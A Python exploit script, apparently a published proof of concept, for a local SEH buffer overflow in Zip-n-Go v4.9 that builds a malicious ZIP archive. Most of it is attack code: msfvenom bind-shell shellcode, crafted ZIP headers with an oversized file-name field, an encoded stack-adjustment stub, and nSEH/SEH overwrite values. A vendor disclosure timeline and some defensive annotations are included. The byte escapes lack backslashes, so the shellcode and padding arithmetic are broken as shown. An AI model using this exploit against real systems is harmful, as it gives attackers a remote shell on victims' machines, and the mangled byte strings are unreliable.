
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://mc1soft.com/index.shtml #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and an alternative approach was suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released
# 06-03-18: Proof of concept exploit published

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b 'x00x0ax0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
# Encoded payload emitted by the msfvenom command quoted above (x86/alpha_mixed,
# BufferRegister=EAX). The lines below add up to the 710 bytes the comment
# reports: 59 lines of 12 bytes plus a final line of 2.
# NOTE(review): in this copy the byte escapes appear without their backslash
# (each "xNN" is three ASCII characters as written), so len(shellcode) evaluates
# to 2130 rather than 710 and the padding arithmetic further down, which assumes
# 710, does not hold -- confirm against the original listing before trusting any
# length derived from this string.
shellcode = ""
shellcode += "x50x59x49x49x49x49x49x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
shellcode += "x50x30x41x30x41x6bx41x41x51x32x41x42"
shellcode += "x32x42x42x30x42x42x41x42x58x50x38x41"
shellcode += "x42x75x4ax49x39x6cx5ax48x6ex62x43x30"
shellcode += "x45x50x73x30x61x70x6dx59x7ax45x46x51"
shellcode += "x39x50x72x44x4ex6bx52x70x30x30x6cx4b"
shellcode += "x52x72x56x6cx6cx4bx73x62x37x64x4cx4b"
shellcode += "x32x52x51x38x54x4fx6fx47x31x5ax61x36"
shellcode += "x50x31x79x6fx4cx6cx35x6cx31x71x51x6c"
shellcode += "x47x72x46x4cx71x30x59x51x5ax6fx44x4d"
shellcode += "x56x61x6bx77x38x62x69x62x72x72x43x67"
shellcode += "x6ex6bx43x62x32x30x6cx4bx33x7ax55x6c"
shellcode += "x6cx4bx32x6cx34x51x34x38x6dx33x37x38"
shellcode += "x57x71x4ax71x66x31x6cx4bx42x79x51x30"
shellcode += "x65x51x59x43x4cx4bx52x69x45x48x6bx53"
shellcode += "x77x4ax47x39x4ex6bx76x54x4ex6bx46x61"
shellcode += "x58x56x36x51x59x6fx6ex4cx49x51x4ax6f"
shellcode += "x76x6dx35x51x68x47x57x48x49x70x62x55"
shellcode += "x48x76x56x63x31x6dx4ax58x55x6bx73x4d"
shellcode += "x35x74x33x45x4bx54x52x78x6cx4bx46x38"
shellcode += "x51x34x56x61x59x43x33x56x6cx4bx76x6c"
shellcode += "x50x4bx4ex6bx46x38x75x4cx67x71x68x53"
shellcode += "x6cx4bx34x44x4ex6bx47x71x78x50x4bx39"
shellcode += "x47x34x57x54x55x74x33x6bx33x6bx55x31"
shellcode += "x31x49x50x5ax42x71x4bx4fx4bx50x31x4f"
shellcode += "x31x4fx72x7ax4cx4bx54x52x6ax4bx6cx4d"
shellcode += "x31x4dx62x48x46x53x50x32x77x70x43x30"
shellcode += "x72x48x70x77x30x73x35x62x43x6fx50x54"
shellcode += "x70x68x72x6cx71x67x67x56x47x77x49x6f"
shellcode += "x68x55x6ex58x4cx50x43x31x45x50x53x30"
shellcode += "x46x49x78x44x33x64x62x70x50x68x76x49"
shellcode += "x4fx70x42x4bx43x30x69x6fx69x45x73x5a"
shellcode += "x67x78x31x49x42x70x6ax42x59x6dx71x50"
shellcode += "x32x70x73x70x36x30x70x68x78x6ax36x6f"
shellcode += "x69x4fx6dx30x6bx4fx69x45x4fx67x63x58"
shellcode += "x47x72x47x70x36x71x31x4cx6cx49x59x76"
shellcode += "x70x6ax74x50x31x46x61x47x45x38x4fx32"
shellcode += "x69x4bx54x77x35x37x79x6fx6ax75x66x37"
shellcode += "x51x78x4dx67x39x79x37x48x59x6fx39x6f"
shellcode += "x6ax75x62x77x61x78x43x44x68x6cx37x4b"
shellcode += "x68x61x69x6fx4ax75x70x57x5ax37x52x48"
shellcode += "x74x35x32x4ex52x6dx45x31x39x6fx4ax75"
shellcode += "x71x78x71x73x30x6dx32x44x65x50x4fx79"
shellcode += "x69x73x36x37x32x77x36x37x70x31x7ax56"
shellcode += "x51x7ax56x72x53x69x36x36x7ax42x49x6d"
shellcode += "x43x56x78x47x33x74x31x34x37x4cx67x71"
shellcode += "x46x61x6ex6dx53x74x34x64x62x30x6ax66"
shellcode += "x65x50x71x54x66x34x52x70x72x76x36x36"
shellcode += "x32x76x31x56x70x56x30x4ex53x66x52x76"
shellcode += "x31x43x32x76x52x48x64x39x38x4cx65x6f"
shellcode += "x4fx76x49x6fx78x55x4bx39x49x70x50x4e"
shellcode += "x53x66x31x56x79x6fx34x70x50x68x65x58"
shellcode += "x4ex67x57x6dx63x50x79x6fx38x55x4dx6b"
shellcode += "x68x70x78x35x6dx72x62x76x72x48x6dx76"
shellcode += "x4dx45x6fx4dx4fx6dx39x6fx4bx65x37x4c"
shellcode += "x77x76x71x6cx46x6ax6fx70x39x6bx4dx30"
shellcode += "x74x35x33x35x6fx4bx61x57x77x63x52x52"
shellcode += "x50x6fx32x4ax73x30x32x73x6bx4fx78x55"
shellcode += "x41x41"

####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
# Local file header, 30 bytes as laid out here. The "file name length" field
# (0x0fe4 = 4068) is the size the target's parser trusts for the name that
# follows; Evil below is built to exactly that length. A bounds check between
# this field and the destination buffer is the missing control the title
# describes, and a sanity limit on this field is a cheap structural check for
# any parser or scanner handling untrusted archives.
# NOTE(review): CRC-32 is written as 3 bytes instead of 4, so a reader that
# follows the ZIP spec would see every later field shifted by one byte; the
# author's comment on that line says the short field is deliberate for this
# target -- confirm against the target parser rather than the spec.
LocalFileHeader = 'x50x4bx03x04' # local file header signature
LocalFileHeader += 'x14x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += 'x00x00' # general purpose bit flag
LocalFileHeader += 'x00x00' # compression method
LocalFileHeader += 'xb7xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += 'xcex34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += 'x00x00x00' # CRC-32 'x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += 'x00x00x00x00' # compressed size
LocalFileHeader += 'x00x00x00x00' # uncompressed size
LocalFileHeader += 'xe4x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += 'x00x00' # extra field length
LocalFileHeader += 'x00' # file name
#LocalFileHeader += 'x00' # extra field
################## Central Directory File Header ##################
# Central directory file header, 46 bytes. Together with the 4068-byte name
# that follows it this is the 0x1012 = 4114 "size of central directory" that
# the end-of-central-directory record below advertises, so the two records
# agree with each other. It repeats the same 0x0fe4 name length as the local
# header; a parser that validates either field against a fixed maximum would
# reject the archive before copying the name.
CDFileHeader = 'x50x4bx01x02' # cd file header signature
CDFileHeader += 'x14x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += 'x14x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += 'x00x00' # general purpose bit flag
CDFileHeader += 'x00x00' # compression method
CDFileHeader += 'xb7xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader += 'xcex34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader += 'x00x00x00x00' # CRC-32
CDFileHeader += 'x00x00x00x00' # compressed size
CDFileHeader += 'x00x00x00x00' # uncompressed size
CDFileHeader += 'xe4x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += 'x00x00' # extra field length
CDFileHeader += 'x00x00' # file comment length
CDFileHeader += 'x00x00' # disk number where file starts
CDFileHeader += 'x01x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += 'x24x00x00x00' # external file attributes
CDFileHeader += 'x00x00x00x00' # relative offset of local file header
#CDFileHeader += 'x00' # file name
#CDFileHeader += 'x00' # extra field
#CDFileHeader += 'x00' # file comment
################ End of Central Directory Record ##################
# End of central directory record (22 bytes, no comment). The central
# directory offset 0x1002 = 4098 is the 30-byte local header plus the
# 4068-byte name, and its size 0x1012 = 4114 is the 46-byte central header
# plus the same name, so the archive is internally consistent and will not be
# rejected on structure alone by a parser that checks these offsets.
EOCDRHeader = 'x50x4bx05x06' # End of central directory signature
EOCDRHeader += 'x00x00' # number of this disk
EOCDRHeader += 'x00x00' # disk where central directory starts
EOCDRHeader += 'x01x00' # number of central directory records on this disk
EOCDRHeader += 'x01x00' # total number of central directory records
EOCDRHeader += 'x12x10x00x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader += 'x02x10x00x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += 'x00x00' # comment length
#EOCDRHeader += 'x00' # comment

# Stack-adjustment stub, as annotated instruction by instruction by the author:
# the first nine instructions save ESP in EDI and move ESP by a fixed amount;
# the remaining groups are the Slink transcript quoted below, where each
# and/and/add/add/add/sub/push group rebuilds one 4-byte word of the decoded
# sequence in EAX and pushes it. Every byte stays in the printable range the
# author's encoder enforces (see the "[!] ... alternative encoder" lines).
# Because this stub is placed inside the archive's file-name field, it is
# another reason a printable-only / length-bounded name check is a useful
# defensive filter for this format.
Witchcraft = 'x54' # PUSH ESP * save stack pointer
Witchcraft += 'x5F' # POP EDI
Witchcraft += 'x54' # PUSH ESP * calculate offset for decoder
Witchcraft += 'x58' # POP EAX
Witchcraft += 'x05x11x21x11x11' # ADD EAX,11112111
Witchcraft += 'x05x11x21x11x11' # ADD EAX,11112111
Witchcraft += 'x2Dx53x25x22x22' # SUB EAX,22222553
Witchcraft += 'x50' # PUSH EAX
Witchcraft += 'x5C' # POP ESP

#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "x25x4Ax4Dx4Ex55" ## and eax, 0x554e4d4a
Witchcraft += "x25x35x32x31x2A" ## and eax, 0x2a313235
Witchcraft += "x05x11x11x77x61" ## add eax, 0x61771111
Witchcraft += "x05x11x11x66x51" ## add eax, 0x51661111
Witchcraft += "x05x11x11x55x61" ## add eax, 0x61551111
Witchcraft += "x2Dx33x33x33x33" ## sub eax, 0x33333333
Witchcraft += "x50" ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "x25x4Ax4Dx4Ex55" ## and eax, 0x554e4d4a
Witchcraft += "x25x35x32x31x2A" ## and eax, 0x2a313235
Witchcraft += "x05x74x13x46x13" ## add eax, 0x13461374
Witchcraft += "x05x64x13x45x13" ## add eax, 0x13451364
Witchcraft += "x05x53x12x34x12" ## add eax, 0x12341253
Witchcraft += "x2Dx33x33x33x33" ## sub eax, 0x33333333
Witchcraft += "x50" ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "x25x4Ax4Dx4Ex55" ## and eax, 0x554e4d4a
Witchcraft += "x25x35x32x31x2A" ## and eax, 0x2a313235
Witchcraft += "x05x41x44x76x44" ## add eax, 0x44764441
Witchcraft += "x05x41x44x65x44" ## add eax, 0x44654441
Witchcraft += "x05x41x34x54x34" ## add eax, 0x34543441
Witchcraft += "x2Dx33x33x33x33" ## sub eax, 0x33333333
Witchcraft += "x50" ## push eax

# The over-long file name. Assuming the escapes are real bytes, the pieces add
# up to 3066 + 716 + 126 + 4 + 4 + 148 + 4 = 4068 bytes, which is exactly the
# 0x0fe4 name length written in both ZIP headers above. (With the mangled
# escapes in this copy the two len() subtractions go negative and the padding
# collapses to an empty string, so the layout only holds for the original.)
# The nSEH/SEH pair shows this is a stack overflow that reaches the exception
# registration record; the handler address the author chose lives in
# zip-n-go.exe itself, which presumably means that module was built without
# SafeSEH/ASLR -- enabling those link-time protections, and bounding the name
# copy as the vendor's later patch did per the timeline above, is the fix class.
Evil = 'x41' * 3066 # offset to shellcode
Evil += shellcode # bind shell
Evil += 'x43' * (716-len(shellcode)) # shellcode host
Evil += Witchcraft # magic!
Evil += 'x42' * (126-len(Witchcraft)) # witchcraft host
Evil += 'x74x80x75x80' # nSEH - short jump backward (jump net)
Evil += 'x6ex4cx40x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe
Evil += 'x41' * (4064-3908-4-4)
Evil += '.txt'

# Assemble the archive: local header, name, central-directory header, name
# again, end record. The same over-long name is written in both places, so
# both the local and central name-length fields advertise 4068 bytes and a
# scanner can flag the file from either header without parsing the other.
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader

# Write the assembled archive to disk. Python 2 syntax (print statement),
# matching the #!/usr/bin/python shebang at the top of the file.
try:
    f=open("Evil.zip","w")
    # Reports len(Evil) (one name field), not len(buffer) (the whole archive).
    print "[+] Creating %s bytes evil payload.." %len(Evil)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except Exception as e:
    # Best-effort reporting only: the handle is not managed with `with`, so it
    # stays open if write() raises, and a partially written file is left behind.
    print e